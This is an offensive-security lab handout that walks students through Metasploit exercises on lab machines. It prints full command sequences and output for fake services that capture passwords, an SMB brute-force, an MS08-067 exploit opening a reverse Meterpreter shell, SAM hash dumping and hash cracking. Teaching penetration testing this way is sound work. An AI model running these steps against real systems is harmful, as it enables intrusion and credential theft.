The purpose of this lab is to provide the student a better understanding of offensive security.
Navigate to the Resources page to obtain the presentations used in this class, as well as other resources on how to build your own lab.
Chris McCoy Hacker, ASIG cmm@cisco.com
Everett Stiles Hacker, ASIG estiles@cisco.com
Omar Ωr Santos Peasant, PSIRT os@cisco.com
Accounts and Passwords
Exercise 1: Capture a Password
In this exercise, you’ll explore the different methods Metasploit has
at its disposal to collect passwords from users that can be tricked into
accessing a service you control.
Task 1
Verify that PostgreSQL server is running…
Status of PostgreSQL
1
nmap -sV
systemctl status postgresql
root@bah-pod1-kali:~# systemctl status postgresql
postgresql.service - PostgreSQL RDBMS
Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disab
Active: active (exited) since Fri 2016-09-30 15:40:39 UTC; 2min 30s ago
Process: 3452 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
Main PID: 3452 (code=exited, status=0/SUCCESS)
Sep 30 15:40:39 bah-pod1-kali systemd[1]: Starting PostgreSQL RDBMS...
Sep 30 15:40:39 bah-pod1-kali systemd[1]: Started PostgreSQL RDBMS.
Task 2
Open Metasploit msfconsole
Open msfconsole
1
msfconsole
Task 3
Using tab completion, find out what services Metasploit can emulate from: use auxiliary/server/ and use auxiliary/server/capture/
msf > use auxiliary/server/[TAB]
use auxiliary/server/android_browsable_msf_launch
use auxiliary/server/android_mercury_parseuri
use auxiliary/server/browser_autopwn
...
Task 4
Set up an FTP password capture session using Metasploit. Log into
this session from Windows Command Prompt with ftp 192.168.1.2
Observe the msfconsole window while doing this
Task 5
Kill the FTP background job. Try jobs -h
Bonus
Try the SMB capture utility while accessing from Windows!
Start → Run… → \\kali.seccon.ninja
How is SMB different in the way it handles its passwords? Did you
have to log in first before credentials were shared with Metasploit?
Bonus
Suggest a way these utilities could be used with IP routing/ARP
poisoning attacks you learned in Module 4.
Exercise 2: Brute-Force a Samba Password with Metasploit
Metasploitable2 has accounts with easily guessable passwords. Enumerate
the accounts and guess the passwords using Metasploit. Wordlists can be
found in /usr/share/wordlists. Make sure db_status shows the
following:
msf > db_status
[*] postgresql connected to msf3
Task 1
Enumerate the users on metasploitable using the auxiliary/scanner/smb/smb_enumusers plugin
Use the SMB Login Check Scanner to brute force into Samba. Try the
username as the password for all users. Use the seccon.txt wordlist
+ Click here for Hint
To reduce the amount of work you have to do, only attempt to brute-force
the following accounts:
msfadmin
user
postgres
sys
klog
service
+ Click here for Cheat
seccon@seccon-kali1:~/labs/08-accounts$ cat users
msfadmin
user
postgres
sys
klog
service
seccon@seccon-kali1:~/labs/08-accounts$ sudo msfconsole
...
msf > use auxiliary/scanner/smb/smb_login
msf auxiliary(smb_login) > set RHOSTS metasploitable
RHOSTS => metasploitable
msf auxiliary(smb_login) > set USER_AS_PASS true
USER_AS_PASS => true
msf auxiliary(smb_login) > set PASS_FILE /usr/share/wordlists/seccon.txt
PASS_FILE => /usr/share/wordlists/seccon.txt
msf auxiliary(smb_login) > set USER_FILE users
USER_FILE => users
msf auxiliary(smb_login) > run
Task 3
View the captured credentials in the database. What is the password
for sys account?
Bonus
Using the results from your active recon and information about services
in the database, figure out an alternate way to log
into metasploitable not involving Samba
Exercise 3: Crack An NTLM-hashed Password
Task 1
Using the MS08-067 vulnerability, exploit and setup
a Meterpreter session
with windows
+ Click here for Hint
Try using the search command:
msf > search ms08_067
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms08_067_netapi 2008-10-28 00:00:00 UTC great MS08-067 Microsoft Server Service Relative Path Stack Corruption
+ Click here for Cheat
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST windows
RHOST => windows
msf exploit(ms08_067_netapi) > run
[*] Started reverse handler on 192.168.1.2:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (769536 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.4:1052) at 2014-11-21 18:15:20 -0800
meterpreter >
Task 2
Display the hashes out
of SAM.
Suspend the Meterpreter session to the background
You can display your current background sessions with
the session command
+ Click here for Cheat
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
meterpreter > background
[*] Backgrounding session 1...
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINDOWS 192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)
msf exploit(ms08_067_netapi) >
Task 3
Dump the hashes out of SAM with
the post/windows/gather/smart_hashdump utility
The hash file in JtR format should show up in loot
+ Click here for Cheat
msf exploit(ms08_067_netapi) > use post/windows/gather/smart_hashdump
msf post(smart_hashdump) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ WINDOWS 192.168.1.2:4444 -> 192.168.1.4:1054 (192.168.1.4)
msf post(smart_hashdump) > set SESSION 1
SESSION => 1
msf post(smart_hashdump) > run
[*] Running module against WINDOWS
[*] Hashes will be saved to the database if one is connected.
[*] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt
[*] Dumping password hashes...
[*] Running as SYSTEM extracting hashes from registry
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 26a1ab029cc81f35c920f4e2409cc7e5...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[+] seccon:"seccon!"
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] HelpAssistant:1000:4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4:::
[+] SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
[+] seccon:1003:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[+] user:1004:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] Post module execution completed
msf post(smart_hashdump) > loot
Loot
====
host service type name content info path
---- ------- ---- ---- ------- ---- ----
192.168.1.4 windows.hashes WINDOWS_hashes.txt text/plain Windows Hashes /root/.msf4/loot/20141121182250_default_192.168.1.4_windows.hashes_123878.txt
Task 4
Crack the NTLM hashes out of SAM with
the auxiliary/analyze/jtr_crack_fast utility
+ Click here for Cheat
msf post(smart_hashdump) > use auxiliary/analyze/jtr_crack_fast
msf auxiliary(jtr_crack_fast) > run
[*] Seeded the password database with 19 words...
fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
[*] Output: Loaded 7 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
fopen: /opt/metasploit/apps/pro/msf3/data/john/run.linux.x86.sse2/password.lst: No such file or directory
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0 time: 0:00:00:04 DONE (Fri Nov 21 18:25:00 2014) c/s: 5462K trying: ZEB1900 - ZZZ1900
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
Warning: mixed-case charset, but the current hash type is case-insensitive;
some candidate passwords may be unnecessarily tried more than once.
guesses: 0 time: 0:00:00:06 DONE (Fri Nov 21 18:25:06 2014) c/s: 25643K trying: ||V} - |||}
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0 time: 0:00:00:00 DONE (Fri Nov 21 18:25:07 2014) c/s: 1307K trying: 89093 - 89092
[*] Output: Loaded 6 password hashes with no different salts (LM DES [128/128 BS SSE2])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] cred_17:SECCON!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[*] cred_16::aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100:::
[*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*]
[*] 5 password hashes cracked, 2 left
guesses: 0 time: 0:00:00:12 DONE (Fri Nov 21 18:25:19 2014) c/s: 10921K trying: zydeco1900 - seccon!1900
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0 time: 0:00:00:05 DONE (Fri Nov 21 18:25:24 2014) c/s: 32030K trying: |||}
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
guesses: 0 time: 0:00:00:00 DONE (Fri Nov 21 18:25:24 2014) c/s: 1709K trying: 89030 - 89092
[*] Output: Loaded 5 password hashes with no different salts (NT MD4 [128/128 SSE2 + 32/32])
[*] Output: Remaining 2 password hashes with no different salts
[*] cred_18:PASSWORD:e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687:::
[*] cred_17:seccon!:e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827:::
[*] cred_14::aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*]
[*] 3 password hashes cracked, 2 left
[+] Cracked: user:PASSWORD (192.168.1.4:445)
[+] Cracked: seccon:seccon! (192.168.1.4:445)
[+] Cracked: Administrator: (192.168.1.4:445)
[*] Auxiliary module execution completed
msf auxiliary(jtr_crack_fast) > creds windows
Credentials
===========
host port user pass type proof active?
---- ---- ---- ---- ---- ----- -------
192.168.1.4 445 user e52cac67419a9a224a3b108f3fa6cb6d:7b592e4f8178b4c75788531b2e747687 smb_hash true
192.168.1.4 445 seccon e17a6020453a1523aad3b435b51404ee:d3eb09053fbe2ba3f37e6e773f763827 smb_hash true
192.168.1.4 445 SUPPORT_388945a0 aad3b435b51404eeaad3b435b51404ee:0b5c1b2296ed366332095252c3f83100 smb_hash true
192.168.1.4 445 HelpAssistant 4f7f3b0478068dbc155ac748a60cd08d:c99241d31fe8453e3cb865be137309b4 smb_hash true
192.168.1.4 445 Administrator aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 smb_hash true
192.168.1.4 445 Administrator password true
192.168.1.4 445 seccon seccon! password true
192.168.1.4 445 user PASSWORD password true
Exercise 4: Crack Me If You Can!!!
KoreLogic throws a yearly contest held at DefCon called Crack Me If You
Can. Your VM has the contest from
Using John the Ripper and HashCat, try to crack as many passwords
as you can.
Bonus
Unzip KoreLogic-2011-CrackMeIfYouCan-tree.zip. Using John the Ripper and
HashCat, try to crack as many passwords as you can.
